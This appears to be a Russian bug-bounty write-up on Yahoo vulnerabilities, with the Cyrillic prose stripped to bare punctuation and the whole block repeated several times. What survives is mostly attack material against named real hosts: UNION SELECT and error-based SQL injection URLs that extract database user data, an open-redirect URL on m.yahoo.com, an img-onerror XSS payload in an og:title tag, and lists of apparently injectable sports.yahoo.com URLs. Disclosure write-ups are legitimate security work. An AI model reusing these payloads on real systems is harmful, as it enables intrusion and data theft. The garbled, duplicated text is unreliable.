sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
